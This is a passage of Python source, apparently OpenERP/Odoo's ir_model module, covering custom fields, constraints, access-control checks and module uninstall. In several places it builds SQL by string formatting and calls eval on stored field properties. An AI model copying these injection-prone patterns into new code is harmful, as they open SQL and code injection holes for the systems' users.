raise except_orm(_('Error'),
_("The Selection Options expression is must be in the [('key','Label'), ...] format!"))
return True
def _size_gt_zero_msg(self, cr, user, ids, context=None):
return _('Size of the field can never be less than 0 !')
_sql_constraints = [
('size_gt_zero', 'CHECK (size>=0)',_size_gt_zero_msg ),
]
def _drop_column(self, cr, uid, ids, context=None):
for field in self.browse(cr, uid, ids, context):
if field.name in MAGIC_COLUMNS:
continue
model = self.pool[field.model]
cr.execute('select relkind from pg_class where relname=%s', (model._table,))
result = cr.fetchone()
cr.execute("SELECT column_name FROM information_schema.columns WHERE table_name ='%s' and column_name='%s'" %(model._table, field.name))
column_name = cr.fetchone()
if column_name and (result and result[0] == 'r'):
cr.execute('ALTER table "%s" DROP column "%s" cascade' % (model._table, field.name))
# remove m2m relation table for custom fields
# we consider the m2m relation is only one way as it's not possible
# to specify the relation table in the interface for custom fields
# TODO master: maybe use ir.model.relations for custom fields
if field.state == 'manual' and field.ttype == 'many2many':
rel_name = model._fields[field.name].relation
cr.execute('DROP table "%s"' % (rel_name))
model._pop_field(field.name)
return True
def unlink(self, cr, user, ids, context=None):
# Prevent manual deletion of module columns
if context is None: context = {}
if isinstance(ids, (int, long)):
ids = [ids]
if not context.get(MODULE_UNINSTALL_FLAG) and \
any(field.state != 'manual' for field in self.browse(cr, user, ids, context)):
raise except_orm(_('Error'), _("This column contains module data and cannot be removed!"))
self._drop_column(cr, user, ids, context)
res = super(ir_model_fields, self).unlink(cr, user, ids, context)
if not context.get(MODULE_UNINSTALL_FLAG):
# The field we just deleted might have be inherited, and registry is
# inconsistent in this case; therefore we reload the registry.
cr.commit()
api.Environment.reset()
RegistryManager.new(cr.dbname)
RegistryManager.signal_registry_change(cr.dbname)
return res
def create(self, cr, user, vals, context=None):
if 'model_id' in vals:
model_data = self.pool['ir.model'].browse(cr, user, vals['model_id'])
vals['model'] = model_data.model
if context is None:
context = {}
if context and context.get('manual',False):
vals['state'] = 'manual'
if vals.get('ttype', False) == 'selection':
if not vals.get('selection',False):
raise except_orm(_('Error'), _('For selection fields, the Selection Options must be given!'))
self._check_selection(cr, user, vals['selection'], context=context)
res = super(ir_model_fields,self).create(cr, user, vals, context)
if vals.get('state','base') == 'manual':
if not vals['name'].startswith('x_'):
raise except_orm(_('Error'), _("Custom fields must have a name that starts with 'x_' !"))
if vals.get('relation',False) and not self.pool['ir.model'].search(cr, user, [('model','=',vals['relation'])]):
raise except_orm(_('Error'), _("Model %s does not exist!") % vals['relation'])
if vals['model'] in self.pool:
model = self.pool[vals['model']]
if vals['model'].startswith('x_') and vals['name'] == 'x_name':
model._rec_name = 'x_name'
if self.pool.fields_by_model is not None:
cr.execute('SELECT * FROM ir_model_fields WHERE id=%s', (res,))
self.pool.fields_by_model.setdefault(vals['model'], []).append(cr.dictfetchone())
# re-initialize model in registry
model.__init__(self.pool, cr)
self.pool.setup_models(cr, partial=(not self.pool.ready))
# update database schema
model = self.pool[vals['model']]
ctx = dict(context,
field_name=vals['name'],
field_state='manual',
select=vals.get('select_level', '0'),
update_custom_fields=True)
model._auto_init(cr, ctx)
model._auto_end(cr, ctx) # actually create FKs!
RegistryManager.signal_registry_change(cr.dbname)
return res
def write(self, cr, user, ids, vals, context=None):
if context is None:
context = {}
if context and context.get('manual',False):
vals['state'] = 'manual'
#For the moment renaming a sparse field or changing the storing system is not allowed. This may be done later
if 'serialization_field_id' in vals or 'name' in vals:
for field in self.browse(cr, user, ids, context=context):
if 'serialization_field_id' in vals and field.serialization_field_id.id != vals['serialization_field_id']:
raise except_orm(_('Error!'), _('Changing the storing system for field "%s" is not allowed.')%field.name)
if field.serialization_field_id and (field.name != vals['name']):
raise except_orm(_('Error!'), _('Renaming sparse field "%s" is not allowed')%field.name)
# if set, *one* column can be renamed here
column_rename = None
# field patches {model: {field_name: {prop_name: prop_value, ...}, ...}, ...}
patches = defaultdict(lambda: defaultdict(dict))
# static table of properties
model_props = [ # (our-name, fields.prop, set_fn)
('field_description', 'string', tools.ustr),
('required', 'required', bool),
('readonly', 'readonly', bool),
('domain', 'domain', eval),
('size', 'size', int),
('on_delete', 'ondelete', str),
('translate', 'translate', bool),
('select_level', 'index', lambda x: bool(int(x))),
('selection', 'selection', eval),
]
if vals and ids:
checked_selection = False # need only check it once, so defer
for item in self.browse(cr, user, ids, context=context):
obj = self.pool.get(item.model)
field = getattr(obj, '_fields', {}).get(item.name)
if item.state != 'manual':
raise except_orm(_('Error!'),
_('Properties of base fields cannot be altered in this manner! '
'Please modify them through Python code, '
'preferably through a custom addon!'))
if item.ttype == 'selection' and 'selection' in vals \
and not checked_selection:
self._check_selection(cr, user, vals['selection'], context=context)
checked_selection = True
final_name = item.name
if 'name' in vals and vals['name'] != item.name:
# We need to rename the column
if column_rename:
raise except_orm(_('Error!'), _('Can only rename one column at a time!'))
if vals['name'] in obj._columns:
raise except_orm(_('Error!'), _('Cannot rename column to %s, because that column already exists!') % vals['name'])
if vals.get('state', 'base') == 'manual' and not vals['name'].startswith('x_'):
raise except_orm(_('Error!'), _('New column name must still start with x_ , because it is a custom field!'))
if '\'' in vals['name'] or '"' in vals['name'] or ';' in vals['name']:
raise ValueError('Invalid character in column name')
column_rename = (obj, (obj._table, item.name, vals['name']))
final_name = vals['name']
if 'model_id' in vals and vals['model_id'] != item.model_id.id:
raise except_orm(_("Error!"), _("Changing the model of a field is forbidden!"))
if 'ttype' in vals and vals['ttype'] != item.ttype:
raise except_orm(_("Error!"), _("Changing the type of a column is not yet supported. "
"Please drop it and create it again!"))
# We don't check the 'state', because it might come from the context
# (thus be set for multiple fields) and will be ignored anyway.
if obj is not None and field is not None:
# find out which properties (per model) we need to update
for field_name, prop_name, func in model_props:
if field_name in vals:
prop_value = func(vals[field_name])
if getattr(field, prop_name) != prop_value:
patches[obj][final_name][prop_name] = prop_value
# These shall never be written (modified)
for column_name in ('model_id', 'model', 'state'):
if column_name in vals:
del vals[column_name]
res = super(ir_model_fields,self).write(cr, user, ids, vals, context=context)
if column_rename:
obj, rename = column_rename
cr.execute('ALTER TABLE "%s" RENAME COLUMN "%s" TO "%s"' % rename)
# This is VERY risky, but let us have this feature:
# we want to change the key of field in obj._fields and obj._columns
field = obj._pop_field(rename[1])
obj._add_field(rename[2], field)
self.pool.setup_models(cr, partial=(not self.pool.ready))
if patches:
# We have to update _columns of the model(s) and then call their
# _auto_init to sync the db with the model. Hopefully, since write()
# was called earlier, they will be in-sync before the _auto_init.
# Anything we don't update in _columns now will be reset from
# the model into ir.model.fields (db).
ctx = dict(context,
select=vals.get('select_level', '0'),
update_custom_fields=True,
)
for obj, model_patches in patches.iteritems():
for field_name, field_patches in model_patches.iteritems():
# update field properties, and adapt corresponding column
field = obj._fields[field_name]
attrs = dict(field._attrs, **field_patches)
obj._add_field(field_name, field.new(**attrs))
# update database schema
self.pool.setup_models(cr, partial=(not self.pool.ready))
obj._auto_init(cr, ctx)
obj._auto_end(cr, ctx) # actually create FKs!
if column_rename or patches:
RegistryManager.signal_registry_change(cr.dbname)
return res
class ir_model_constraint(Model):
"""
This model tracks PostgreSQL foreign keys and constraints used by OpenERP
models.
"""
_name = 'ir.model.constraint'
_columns = {
'name': fields.char('Constraint', required=True, select=1,
help="PostgreSQL constraint or foreign key name."),
'model': fields.many2one('ir.model', string='Model',
required=True, select=1),
'module': fields.many2one('ir.module.module', string='Module',
required=True, select=1),
'type': fields.char('Constraint Type', required=True, size=1, select=1,
help="Type of the constraint: `f` for a foreign key, "
"`u` for other constraints."),
'date_update': fields.datetime('Update Date'),
'date_init': fields.datetime('Initialization Date')
}
_sql_constraints = [
('module_name_uniq', 'unique(name, module)',
'Constraints with the same name are unique per module.'),
]
def _module_data_uninstall(self, cr, uid, ids, context=None):
"""
Delete PostgreSQL foreign keys and constraints tracked by this model.
"""
if uid != SUPERUSER_ID and not self.pool['ir.model.access'].check_groups(cr, uid, "base.group_system"):
raise except_orm(_('Permission Denied'), (_('Administrator access is required to uninstall a module')))
context = dict(context or {})
ids_set = set(ids)
ids.sort()
ids.reverse()
for data in self.browse(cr, uid, ids, context):
model = data.model.model
model_obj = self.pool[model]
name = openerp.tools.ustr(data.name)
typ = data.type
# double-check we are really going to delete all the owners of this schema element
cr.execute("""SELECT id from ir_model_constraint where name=%s""", (data.name,))
external_ids = [x[0] for x in cr.fetchall()]
if set(external_ids)-ids_set:
# as installed modules have defined this element we must not delete it!
continue
if typ == 'f':
# test if FK exists on this table (it could be on a related m2m table, in which case we ignore it)
cr.execute("""SELECT 1 from pg_constraint cs JOIN pg_class cl ON (cs.conrelid = cl.oid)
WHERE cs.contype=%s and cs.conname=%s and cl.relname=%s""", ('f', name, model_obj._table))
if cr.fetchone():
cr.execute('ALTER TABLE "%s" DROP CONSTRAINT "%s"' % (model_obj._table, name),)
_logger.info('Dropped FK CONSTRAINT %s@%s', name, model)
if typ == 'u':
# test if constraint exists
cr.execute("""SELECT 1 from pg_constraint cs JOIN pg_class cl ON (cs.conrelid = cl.oid)
WHERE cs.contype=%s and cs.conname=%s and cl.relname=%s""", ('u', name, model_obj._table))
if cr.fetchone():
cr.execute('ALTER TABLE "%s" DROP CONSTRAINT "%s"' % (model_obj._table, name),)
_logger.info('Dropped CONSTRAINT %s@%s', name, model)
self.unlink(cr, uid, ids, context)
class ir_model_relation(Model):
"""
This model tracks PostgreSQL tables used to implement OpenERP many2many
relations.
"""
_name = 'ir.model.relation'
_columns = {
'name': fields.char('Relation Name', required=True, select=1,
help="PostgreSQL table name implementing a many2many relation."),
'model': fields.many2one('ir.model', string='Model',
required=True, select=1),
'module': fields.many2one('ir.module.module', string='Module',
required=True, select=1),
'date_update': fields.datetime('Update Date'),
'date_init': fields.datetime('Initialization Date')
}
def _module_data_uninstall(self, cr, uid, ids, context=None):
"""
Delete PostgreSQL many2many relations tracked by this model.
"""
if uid != SUPERUSER_ID and not self.pool['ir.model.access'].check_groups(cr, uid, "base.group_system"):
raise except_orm(_('Permission Denied'), (_('Administrator access is required to uninstall a module')))
ids_set = set(ids)
to_drop_table = []
ids.sort()
ids.reverse()
for data in self.browse(cr, uid, ids, context):
model = data.model
name = openerp.tools.ustr(data.name)
# double-check we are really going to delete all the owners of this schema element
cr.execute("""SELECT id from ir_model_relation where name = %s""", (data.name,))
external_ids = [x[0] for x in cr.fetchall()]
if set(external_ids)-ids_set:
# as installed modules have defined this element we must not delete it!
continue
cr.execute("SELECT 1 FROM information_schema.tables WHERE table_name=%s", (name,))
if cr.fetchone() and not name in to_drop_table:
to_drop_table.append(name)
self.unlink(cr, uid, ids, context)
# drop m2m relation tables
for table in to_drop_table:
cr.execute('DROP TABLE %s CASCADE'% table,)
_logger.info('Dropped table %s', table)
cr.commit()
class ir_model_access(osv.osv):
_name = 'ir.model.access'
_columns = {
'name': fields.char('Name', required=True, select=True),
'active': fields.boolean('Active', help='If you uncheck the active field, it will disable the ACL without deleting it (if you delete a native ACL, it will be re-created when you reload the module.'),
'model_id': fields.many2one('ir.model', 'Object', required=True, domain=[('osv_memory','=', False)], select=True, ondelete='cascade'),
'group_id': fields.many2one('res.groups', 'Group', ondelete='cascade', select=True),
'perm_read': fields.boolean('Read Access'),
'perm_write': fields.boolean('Write Access'),
'perm_create': fields.boolean('Create Access'),
'perm_unlink': fields.boolean('Delete Access'),
}
_defaults = {
'active': True,
}
def check_groups(self, cr, uid, group):
grouparr = group.split('.')
if not grouparr:
return False
cr.execute("select 1 from res_groups_users_rel where uid=%s and gid IN (select res_id from ir_model_data where module=%s and name=%s)", (uid, grouparr[0], grouparr[1],))
return bool(cr.fetchone())
def check_group(self, cr, uid, model, mode, group_ids):
""" Check if a specific group has the access mode to the specified model"""
assert mode in ['read','write','create','unlink'], 'Invalid access mode'
if isinstance(model, BaseModel):
assert model._name == 'ir.model', 'Invalid model object'
model_name = model.name
else:
model_name = model
if isinstance(group_ids, (int, long)):
group_ids = [group_ids]
for group_id in group_ids:
cr.execute("SELECT perm_" + mode + " "
" FROM ir_model_access a "
" JOIN ir_model m ON (m.id = a.model_id) "
" WHERE m.model = %s AND a.active IS True "
" AND a.group_id = %s", (model_name, group_id)
)
r = cr.fetchone()
if r is None:
cr.execute("SELECT perm_" + mode + " "
" FROM ir_model_access a "
" JOIN ir_model m ON (m.id = a.model_id) "
" WHERE m.model = %s AND a.active IS True "
" AND a.group_id IS NULL", (model_name, )
)
r = cr.fetchone()
access = bool(r and r[0])
if access:
return True
# pass no groups -> no access
return False
def group_names_with_access(self, cr, model_name, access_mode):
"""Returns the names of visible groups which have been granted ``access_mode`` on
the model ``model_name``.
:rtype: list
"""
assert access_mode in ['read','write','create','unlink'], 'Invalid access mode: %s' % access_mode
cr.execute('''SELECT
c.name, g.name
FROM
ir_model_access a
JOIN ir_model m ON (a.model_id=m.id)
JOIN res_groups g ON (a.group_id=g.id)
LEFT JOIN ir_module_category c ON (c.id=g.category_id)
WHERE
m.model=%s AND
a.active IS True AND
a.perm_''' + access_mode, (model_name,))
return [('%s/%s' % x) if x[0] else x[1] for x in cr.fetchall()]
@tools.ormcache()
def check(self, cr, uid, model, mode='read', raise_exception=True, context=None):
if uid==1:
# User root have all accesses
# TODO: exclude xml-rpc requests
return True
assert mode in ['read','write','create','unlink'], 'Invalid access mode'
if isinstance(model, BaseModel):
assert model._name == 'ir.model', 'Invalid model object'
model_name = model.model
else:
model_name = model
# TransientModel records have no access rights, only an implicit access rule
if model_name not in self.pool:
_logger.error('Missing model %s' % (model_name, ))
elif self.pool[model_name].is_transient():
return True
# We check if a specific rule exists
cr.execute('SELECT MAX(CASE WHEN perm_' + mode + ' THEN 1 ELSE 0 END) '
' FROM ir_model_access a '
' JOIN ir_model m ON (m.id = a.model_id) '
' JOIN res_groups_users_rel gu ON (gu.gid = a.group_id) '
' WHERE m.model = %s '
' AND gu.uid = %s '
' AND a.active IS True '
, (model_name, uid,)
)
r = cr.fetchone()[0]
if r is None:
# there is no specific rule. We check the generic rule
cr.execute('SELECT MAX(CASE WHEN perm_' + mode + ' THEN 1 ELSE 0 END) '
' FROM ir_model_access a '
' JOIN ir_model m ON (m.id = a.model_id) '
' WHERE a.group_id IS NULL '
' AND m.model = %s '
' AND a.active IS True '
, (model_name,)
)
r = cr.fetchone()[0]
if not r and raise_exception:
groups = '\n\t'.join('- %s' % g for g in self.group_names_with_access(cr, model_name, mode))
msg_heads = {
# Messages are declared in extenso so they are properly exported in translation terms
'read': _("Sorry, you are not allowed to access this document."),
'write': _("Sorry, you are not allowed to modify this document."),
'create': _("Sorry, you are not allowed to create this kind of document."),
'unlink': _("Sorry, you are not allowed to delete this document."),
}
if groups:
msg_tail = _("Only users with the following access level are currently allowed to do that") + ":\n%s\n\n(" + _("Document model") + ": %s)"
msg_params = (groups, model_name)
else:
msg_tail = _("Please contact your system administrator if you think this is an error.") + "\n\n(" + _("Document model") + ": %s)"
msg_params = (model_name,)
_logger.warning('Access Denied by ACLs for operation: %s, uid: %s, model: %s', mode, uid, model_name)
msg = '%s %s' % (msg_heads[mode], msg_tail)
raise openerp.exceptions.AccessError(msg % msg_params)
return bool(r)
__cache_clearing_methods = []
def register_cache_clearing_method(self, model, method):
self.__cache_clearing_methods.append((model, method))
def unregister_cache_clearing_method(self, model, method):
try:
i = self.__cache_clearing_methods.index((model, method))
del self.__cache_clearing_methods[i]
except ValueError:
pass
def call_cache_clearing_methods(self, cr):
self.invalidate_cache(cr, SUPERUSER_ID)
self.check.clear_cache(self) # clear the cache of check function
for model, method in self.__cache_clearing_methods:
if model in self.pool:
getattr(self.pool[model], method)()
#
# Check rights on actions
#
def write(self, cr, uid, ids, values, context=None):
self.call_cache_clearing_methods(cr)
res = super(ir_model_access, self).write(cr, uid, ids, values, context=context)
return res
def create(self, cr, uid, values, context=None):
self.call_cache_clearing_methods(cr)
res = super(ir_model_access, self).create(cr, uid, values, context=context)
return res
def unlink(self, cr, uid, ids, context=None):
self.call_cache_clearing_methods(cr)
res = super(ir_model_access, self).unlink(cr, uid, ids, context=context)
return res
class ir_model_data(osv.osv):
"""Holds external identifier keys for records in the database.
This has two main uses:
* allows easy data integration with third-party systems,
making import/export/sync of data possible, as records
can be uniquely identified across multiple systems
* allows tracking the origin of data installed by OpenERP
modules themselves, thus making it possible to later
update them seamlessly.
"""
_name = 'ir.model.data'
_order = 'module,model,name'
def name_get(self, cr, uid, ids, context=None):
bymodel = defaultdict(dict)
names = {}
for res in self.browse(cr, uid, ids, context=context):
bymodel[res.model][res.res_id] = res
names[res.id] = res.complete_name
#result[res.model][res.res_id] = res.id
for model, id_map in bymodel.iteritems():
try:
ng = dict(self.pool[model].name_get(cr, uid, id_map.keys(), context=context))
except Exception:
pass
else:
for r in id_map.itervalues():
names[r.id] = ng.get(r.res_id, r.complete_name)
return [(i, names[i]) for i in ids]
def _complete_name_get(self, cr, uid, ids, prop, unknow_none, context=None):
result = {}
for res in self.browse(cr, uid, ids, context=context):
result[res.id] = (res.module and (res.module + '.') or '')+res.name
return result
_columns = {
'name': fields.char('External Identifier', required=True, select=1,
help="External Key/Identifier that can be used for "
"data integration with third-party systems"),
'complete_name': fields.function(_complete_name_get, type='char', string='Complete ID'),
'model': fields.char('Model Name', required=True, select=1),
'module': fields.char('Module', required=True, select=1),
'res_id': fields.integer('Record ID', select=1,
help="ID of the target record in the database"),
'noupdate': fields.boolean('Non Updatable'),
'date_update': fields.datetime('Update Date'),
'date_init': fields.datetime('Init Date')
}
_defaults = {
'date_init': fields.datetime.now,
'date_update': fields.datetime.now,
'noupdate': False,
'module': ''
}
_sql_constraints = [
('module_name_uniq', 'unique(name, module)', 'You cannot have multiple records with the same external ID in the same module!'),
]
def __init__(self, pool, cr):
osv.osv.__init__(self, pool, cr)
# also stored in pool to avoid being discarded along with this osv instance
if getattr(pool, 'model_data_reference_ids', None) is None:
self.pool.model_data_reference_ids = {}
# put loads on the class, in order to share it among all instances
type(self).loads = self.pool.model_data_reference_ids
def _auto_init(self, cr, context=None):
super(ir_model_data, self)._auto_init(cr, context)
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = \'ir_model_data_module_name_index\'')
if not cr.fetchone():
cr.execute('CREATE INDEX ir_model_data_module_name_index ON ir_model_data (module, name)')
# NEW V8 API
@tools.ormcache(skiparg=3)
def xmlid_lookup(self, cr, uid, xmlid):
"""Low level xmlid lookup
Return (id, res_model, res_id) or raise ValueError if not found
"""
module, name = xmlid.split('.', 1)
ids = self.search(cr, uid, [('module','=',module), ('name','=', name)])
if not ids:
raise ValueError('External ID not found in the system: %s' % (xmlid))
# the sql constraints ensure us we have only one result
res = self.read(cr, uid, ids[0], ['model', 'res_id'])
if not res['res_id']:
raise ValueError('External ID not found in the system: %s' % (xmlid))
return ids[0], res['model'], res['res_id']
def xmlid_to_res_model_res_id(self, cr, uid, xmlid, raise_if_not_found=False):
""" Return (res_model, res_id)"""
try:
return self.xmlid_lookup(cr, uid, xmlid)[1:3]
except ValueError:
if raise_if_not_found:
raise
return (False, False)
def xmlid_to_res_id(self, cr, uid, xmlid, raise_if_not_found=False):
""" Returns res_id """
return self.xmlid_to_res_model_res_id(cr, uid, xmlid, raise_if_not_found)[1]
def xmlid_to_object(self, cr, uid, xmlid, raise_if_not_found=False, context=None):
""" Return a browse_record
if not found and raise_if_not_found is True return None
"""
t = self.xmlid_to_res_model_res_id(cr, uid, xmlid, raise_if_not_found)
res_model, res_id = t
if res_model and res_id:
record = self.pool[res_model].browse(cr, uid, res_id, context=context)
if record.exists():
return record
if raise_if_not_found:
raise ValueError('No record found for unique ID %s. It may have been deleted.' % (xmlid))
return None
# OLD API
def _get_id(self, cr, uid, module, xml_id):
"""Returns the id of the ir.model.data record corresponding to a given module and xml_id (cached) or raise a ValueError if not found"""
return self.xmlid_lookup(cr, uid, "%s.%s" % (module, xml_id))[0]
def get_object_reference(self, cr, uid, module, xml_id):
"""Returns (model, res_id) corresponding to a given module and xml_id (cached) or raise ValueError if not found"""
return self.xmlid_lookup(cr, uid, "%s.%s" % (module, xml_id))[1:3]
def check_object_reference(self, cr, uid, module, xml_id, raise_on_access_error=False):
"""Returns (model, res_id) corresponding to a given module and xml_id (cached), if and only if the user has the necessary access rights
to see that object, otherwise raise a ValueError if raise_on_access_error is True or returns a tuple (model found, False)"""
model, res_id = self.get_object_reference(cr, uid, module, xml_id)
#search on id found in result to check if current user has read access right
check_right = self.pool.get(model).search(cr, uid, [('id', '=', res_id)])
if check_right:
return model, res_id
if raise_on_access_error:
raise ValueError('Not enough access rights on the external ID: %s.%s' % (module, xml_id))
return model, False
def get_object(self, cr, uid, module, xml_id, context=None):
""" Returns a browsable record for the given module name and xml_id.
If not found, raise a ValueError or return None, depending
on the value of `raise_exception`.
"""
return self.xmlid_to_object(cr, uid, "%s.%s" % (module, xml_id), raise_if_not_found=True, context=context)
def _update_dummy(self,cr, uid, model, module, xml_id=False, store=True):
if not xml_id:
return False
try:
id = self.read(cr, uid, [self._get_id(cr, uid, module, xml_id)], ['res_id'])[0]['res_id']
self.loads[(module,xml_id)] = (model,id)
except:
id = False
return id
def clear_caches(self):
""" Clears all orm caches on the object's methods
:returns: itself
"""
self.xmlid_lookup.clear_cache(self)
return self
def unlink(self, cr, uid, ids, context=None):
""" Regular unlink method, but make sure to clear the caches. """
self.clear_caches()
return super(ir_model_data,self).unlink(cr, uid, ids, context=context)
def _update(self,cr, uid, model, module, values, xml_id=False, store=True, noupdate=False, mode='init', res_id=False, context=None):
model_obj = self.pool[model]
if not context:
context = {}
# records created during module install should not display the messages of OpenChatter
context = dict(context, install_mode=True)
if xml_id and ('.' in xml_id):
assert len(xml_id.split('.'))==2, _("'%s' contains too many dots. XML ids should not contain dots ! These are used to refer to other modules data, as in module.reference_id") % xml_id
module, xml_id = xml_id.split('.')
action_id = False
if xml_id:
cr.execute('''SELECT imd.id, imd.res_id, md.id, imd.model, imd.noupdate
FROM ir_model_data imd LEFT JOIN %s md ON (imd.res_id = md.id)
WHERE imd.module=%%s AND imd.name=%%s''' % model_obj._table,
(module, xml_id))
results = cr.fetchall()
for imd_id2,res_id2,real_id2,real_model,noupdate_imd in results:
# In update mode, do not update a record if it's ir.model.data is flagged as noupdate
if mode == 'update' and noupdate_imd:
return res_id2
if not real_id2:
self.clear_caches()
cr.execute('delete from ir_model_data where id=%s', (imd_id2,))
res_id = False
else:
assert model == real_model, "External ID conflict, %s already refers to a `%s` record,"\
" you can't define a `%s` record with this ID." % (xml_id, real_model, model)
res_id,action_id = res_id2,imd_id2
if action_id and res_id:
model_obj.write(cr, uid, [res_id], values, context=context)
self.write(cr, uid, [action_id], {
'date_update': time.strftime('%Y-%m-%d %H:%M:%S'),
},context=context)
elif res_id:
model_obj.write(cr, uid, [res_id], values, context=context)
if xml_id:
if model_obj._inherits:
for table in model_obj._inherits:
inherit_id = model_obj.browse(cr, uid,
res_id,context=context)[model_obj._inherits[table]]
self.create(cr, uid, {
'name': xml_id + '_' + table.replace('.', '_'),
'model': table,
'module': module,
'res_id': inherit_id.id,
'noupdate': noupdate,
},context=context)
self.create(cr, uid, {
'name': xml_id,
'model': model,
'module':module,
'res_id':res_id,
'noupdate': noupdate,
},context=context)
else:
if mode=='init' or (mode=='update' and xml_id):
res_id = model_obj.create(cr, uid, values, context=context)
if xml_id:
if model_obj._inherits:
for table in model_obj._inherits:
inherit_id = model_obj.browse(cr, uid,
res_id,context=context)[model_obj._inherits[table]]
self.create(cr, uid, {
'name': xml_id + '_' + table.replace('.', '_'),
'model': table,
'module': module,
'res_id': inherit_id.id,
'noupdate': noupdate,
},context=context)
self.create(cr, uid, {
'name': xml_id,
'model': model,
'module': module,
'res_id': res_id,
'noupdate': noupdate
},context=context)
if xml_id and res_id:
self.loads[(module, xml_id)] = (model, res_id)
for table, inherit_field in model_obj._inherits.iteritems():
inherit_id = model_obj.read(cr, uid, [res_id],
[inherit_field])[0][inherit_field]
self.loads[(module, xml_id + '_' + table.replace('.', '_'))] = (table, inherit_id)
return res_id
def ir_set(self, cr, uid, key, key2, name, models, value, replace=True, isobject=False, meta=None, xml_id=False):
if isinstance(models[0], (list, tuple)):
model,res_id = models[0]
else:
res_id=None
model = models[0]
if res_id:
where = ' and res_id=%s' % (res_id,)
else:
where = ' and (res_id is null)'
if key2:
where += ' and key2=\'%s\'' % (key2,)
else:
where += ' and (key2 is null)'
cr.execute('select * from ir_values where model=%s and key=%s and name=%s'+where,(model, key, name))
res = cr.fetchone()
ir_values_obj = openerp.registry(cr.dbname)['ir.values']
if not res:
ir_values_obj.set(cr, uid, key, key2, name, models, value, replace, isobject, meta)
elif xml_id:
cr.execute('UPDATE ir_values set value=%s WHERE model=%s and key=%s and name=%s'+where,(value, model, key, name))
ir_values_obj.invalidate_cache(cr, uid, ['value'])
return True
def _module_data_uninstall(self, cr, uid, modules_to_remove, context=None):
"""Deletes all the records referenced by the ir.model.data entries
``ids`` along with their corresponding database backed (including
dropping tables, columns, FKs, etc, as long as there is no other
ir.model.data entry holding a reference to them (which indicates that
they are still owned by another module).
Attempts to perform the deletion in an appropriate order to maximize
the chance of gracefully deleting all records.
This step is performed as part of the full uninstallation of a module.
"""
ids = self.search(cr, uid, [('module', 'in', modules_to_remove)])
if uid != 1 and not self.pool['ir.model.access'].check_groups(cr, uid, "base.group_system"):
raise except_orm(_('Permission Denied'), (_('Administrator access is required to uninstall a module')))
context = dict(context or {})
context[MODULE_UNINSTALL_FLAG] = True # enable model/field deletion
ids_set = set(ids)
wkf_todo = []
to_unlink = []
ids.sort()
ids.reverse()
for data in self.browse(cr, uid, ids, context):
model = data.model
res_id = data.res_id
pair_to_unlink = (model, res_id)
if pair_to_unlink not in to_unlink:
to_unlink.append(pair_to_unlink)
if model == 'workflow.activity':
# Special treatment for workflow activities: temporarily revert their
# incoming transition and trigger an update to force all workflow items
# to move out before deleting them
cr.execute('select res_type,res_id from wkf_instance where id IN (select inst_id from wkf_workitem where act_id=%s)', (res_id,))
wkf_todo.extend(cr.fetchall())
cr.execute("update wkf_transition set condition='True', group_id=NULL, signal=NULL,act_to=act_from,act_from=%s where act_to=%s", (res_id,res_id))
self.invalidate_cache(cr, uid, context=context)
for model,res_id in wkf_todo:
try:
openerp.workflow.trg_write(uid, model, res_id, cr)
except Exception:
_logger.info('Unable to force processing of workflow for item %s@%s in order to leave activity to be deleted', res_id, model, exc_info=True)
def unlink_if_refcount(to_unlink):
for model, res_id in to_unlink:
external_ids = self.search(cr, uid, [('model', '=', model),('res_id', '=', res_id)])
if set(external_ids)-ids_set:
# if other modules have defined this record, we must not delete it
continue
if model == 'ir.model.fields':
# Don't remove the LOG_ACCESS_COLUMNS unless _log_access
# has been turned off on the model.
field = self.pool[model].browse(cr, uid, [res_id], context=context)[0]
if not field.exists():
_logger.info('Deleting orphan external_ids %s', external_ids)
self.unlink(cr, uid, external_ids)
continue
if field.name in openerp.models.LOG_ACCESS_COLUMNS and self.pool[field.model]._log_access:
continue
if field.name == 'id':
continue
_logger.info('Deleting %s@%s', res_id, model)
try:
cr.execute('SAVEPOINT record_unlink_save')
self.pool[model].unlink(cr, uid, [res_id], context=context)
except Exception:
_logger.info('Unable to delete %s@%s', res_id, model, exc_info=True)
cr.execute('ROLLBACK TO SAVEPOINT record_unlink_save')
else:
cr.execute('RELEASE SAVEPOINT record_unlink_save')
# Remove non-model records first, then model fields, and finish with models
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model not in ('ir.model','ir.model.fields','ir.model.constraint'))
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model == 'ir.model.constraint')
ir_module_module = self.pool['ir.module.module']
ir_model_constraint = self.pool['ir.model.constraint']
modules_to_remove_ids = ir_module_module.search(cr, uid, [('name', 'in', modules_to_remove)], context=context)
constraint_ids = ir_model_constraint.search(cr, uid, [('module', 'in', modules_to_remove_ids)], context=context)
ir_model_constraint._module_data_uninstall(cr, uid, constraint_ids, context)
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model == 'ir.model.fields')
ir_model_relation = self.pool['ir.model.relation']
relation_ids = ir_model_relation.search(cr, uid, [('module', 'in', modules_to_remove_ids)])
ir_model_relation._module_data_uninstall(cr, uid, relation_ids, context)
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model == 'ir.model')
cr.commit()
self.unlink(cr, uid, ids, context)
def _process_end(self, cr, uid, modules):
""" Clear records removed from updated module data.
This method is called at the end of the module loading process.
It is meant to removed records that are no longer present in the
updated data. Such records are recognised as the one with an xml id
and a module in ir_model_data and noupdate set to false, but not
present in self.loads.
"""
if not modules:
return True
to_unlink = []
cr.execute("""SELECT id,name,model,res_id,module FROM ir_model_data
WHERE module IN %s AND res_id IS NOT NULL AND noupdate=%s ORDER BY id DESC""",
(tuple(modules), False))
for (id, name, model, res_id, module) in cr.fetchall():
if (module,name) not in self.loads:
to_unlink.append((model,res_id))
if not config.get('import_partial'):
for (model, res_id) in to_unlink:
if model in self.pool:
_logger.info('Deleting %s@%s', res_id, model)
self.pool[model].unlink(cr, uid, [res_id])
class wizard_model_menu(osv.osv_memory):
_name = 'wizard.ir.model.menu.create'
_columns = {
'menu_id': fields.many2one('ir.ui.menu', 'Parent Menu', required=True),
'name': fields.char('Menu Name', required=True),
}
def menu_create(self, cr, uid, ids, context=None):
if not context:
context = {}
model_pool = self.pool.get('ir.model')
for menu in self.browse(cr, uid, ids, context):
model = model_pool.browse(cr, uid, context.get('model_id'), context=context)
val = {
'name': menu.name,
'res_model': model.model,
'view_type': 'form',
'view_mode': 'tree,form'
}
action_id = self.pool.get('ir.actions.act_window').create(cr, uid, val)
self.pool.get('ir.ui.menu').create(cr, uid, {
'name': menu.name,
'parent_id': menu.menu_id.id,
'action': 'ir.actions.act_window,%d' % (action_id,),
